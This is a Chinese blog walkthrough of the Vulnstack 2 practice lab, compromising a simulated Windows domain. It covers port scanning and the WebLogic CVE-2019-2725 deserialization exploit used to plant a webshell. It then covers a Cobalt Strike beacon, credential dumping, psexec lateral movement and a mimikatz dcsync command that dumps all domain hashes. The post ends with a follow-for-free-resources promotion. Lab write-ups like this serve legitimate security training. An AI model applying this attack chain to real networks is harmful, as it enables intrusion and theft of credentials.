这是红日的第二套靶场,一开始直接通过域管起的weblogic,有点别扭,建议还是通过本地的用户来起weblogic,漏洞利用的点很多,不要局限于这篇文章,可以多尝试尝试其他漏洞。
靶场地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
密码均为:1qaz@WSX
靶场拓扑
需要自己起一下环境 C:\Oracle\Middleware\user_projects\domains\base_domain\bin\startWebLogic
端口扫描
nmap -sV -sS -p- -Pn 192.168.85.148
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp open ssl/ms-wbt-server?
7001/tcp open http Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
60966/tcp open ms-sql-s Microsoft SQL Server 2008 R2 10.50.4000; SP2
MAC Address: 00:0C:29:68:D3:5F (VMware)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
80端口是没有东西的,看一下7001端口,这是weblogic的默认端口 访问7001端口,报错页面,应该就能确定这是一个weblogic了
进入console尝试一下弱口令,结果是不出意外的进不去 直接工具扫一下,直接一把梭了
目标机器是存在多个漏洞的,这里使用Weblogic Wls9-async反序列化漏洞,CVE编号为CVE-2019-2725
影响的版本为:Weblogic 10.x, Weblogic 12.1.3 漏洞描述:
该漏洞是由wls9-async组件导致的,该War包在反序列化处理的时候存在缺陷,可以在/_async/AsyncResponseService路径下构造恶意XML,从而导致在未授权的情况下远程命令执行
先上传一个jsp的木马,方便上传下载文件,这里直接用冰蝎自带的木马 将shell写入下面的路径
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp
关于weblogic上传路径如何选择可以参考:https://www.cnblogs.com/sstfy/p/10350915.html
然后直接连接http://192.168.85.148:7001/uddiexplorer/shell.jsp即可
查看一下目标机器的进程,发现是存在360的
直接丢一个免杀马,上线cs,这里就可以看到这台机器是存在两张网卡
内网信息收集
首先通过cs抓一下密码,整理一下
本地用户
administrator:Admin@123
域用户 de1ay.com:
mssql:1qaz@WSX
administrator:1qaz@WSX
de1ay:1qaz@WSX
额。。。这里直接拿到域管的密码了,就当看不见,一台机器一台机器的打吧
拿到本地管理员密码,并且目标机器开启3389端口的,尝试登录到机器上,关掉360好做事情
已经知道目标机器是存在两张网卡的,192.168.85.1/24和10.10.10.1/24 上传fscan扫描一下这两个段 扫描192.168.85.1/24发现还存在一台192.168.85.151的机器,并且存在ms170-10漏洞
扫描10.10.10.1/24网段,10.10.10.10和10.10.10.201均存在ms17010漏洞
10.10.10.201和192.168.85.151是一台机器
基本可以确定这两个网段存活的主机了 整理一下主机信息
DC$ DC.de1ay.com 10.10.10.10
PC$ PC.de1ay.com 10.10.10.201,192.168.85.151
WEB$ WEB.de1ay.com 10.10.10.80,192.168.85.148
域管:administrator:1qaz@WSX
域用户:de1ay:1qaz@WSX,mssql:1qaz@WSX
既然PC这台机器是有外网IP的,那么直接通过msf打一下ms170-010 不出意外根本打不通
3389端口也连接不上....
先放一下看一下域控吧 设置一下cs的代理 可直接通过de1ay用户横向到DC,并且是system权限
proxychains4 impacket-psexec de1ay.com/de1ay:1qaz@WSX@10.10.10.10
直接通过cs自带的功能上线DC
上传mimikatz直接通过dcsync获取域内所有用户的hash
lsadump::dcsync /domain:de1ay.com /all /csv
直接通过域管的hash上线PC机器,三台机器全部上线cs
看到这里的大佬,动动发财的小手 点赞 + 回复 + 收藏,能【 关注 】一波就更好了
我是一名渗透测试工程师,为了感谢读者们,我想把我收藏的一些网络安全/渗透测试学习干货贡献给大家,回馈每一个读者,希望能帮到你们。
干货主要有:
①2000多本网安必看电子书(主流和经典的书籍应该都有了)
②PHP标准库资料(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ 网络安全基础入门、Linux运维,web安全、渗透测试方面的视频(适合小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ 渗透测试工具大全
⑦ 2023网络安全/Web安全/渗透测试工程师面试手册大全
各位朋友们可以关注+评论一波 然后点击下方 即可免费拿捏